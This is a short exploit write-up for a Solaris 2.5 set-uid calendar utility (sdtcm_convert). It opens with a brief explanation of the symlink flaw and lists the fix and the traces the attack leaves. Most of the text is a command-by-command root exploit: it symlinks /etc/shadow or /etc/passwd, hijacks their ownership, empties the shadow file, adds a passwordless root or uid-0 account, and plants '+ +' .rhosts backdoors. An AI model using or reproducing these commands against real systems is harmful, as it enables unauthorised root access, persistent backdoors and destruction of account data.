|
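solaris 2.5 calendar root exploit.

Why this works, as far as the transcript shows: sdtcm_convert (shipped set-uid root with CDE) operates on /tmp/calorig.<username> without checking whether it is a symlink, so the link target evidently ends up owned by the calling user, which is why the chmod that follows succeeds. The exposure is the set-uid bit on /usr/dt/bin/sdtcm_convert (apply the vendor patch or remove the bit); the traces are an unexpected owner or mode on /etc/shadow or /etc/passwd, an unknown uid-0 account, and "+ +" entries in .rhosts files.

% ln -s /etc/shadow /tmp/calorig.<username>
% /usr/dt/bin/sdtcm_convert -d /tmp -v 3 <username>
% ls -l /etc/shadow
% chmod 644 /etc/shadow
% cp /dev/null /etc/shadow
% ls -l /etc/shadow
% echo "root::6445::::::" >> /etc/shadow
% su

or, if /etc/shadow doesn't exist:

% ln -s /etc/passwd /tmp/calorig.<username>
% /usr/dt/bin/sdtcm_convert -d /tmp -v 3 <username>
% ls -l /etc/passwd
% chmod 644 /etc/passwd
% ls -l /etc/shadow
% echo "friday::0:0:mr.friday:/:/bin/bash" >> /etc/passwd
% telnet localhost 23
% cd
% echo "+ +" >> /usr/bin/.rhosts
% echo "+ +" >> .rhosts

<finger users and set up .rhosts>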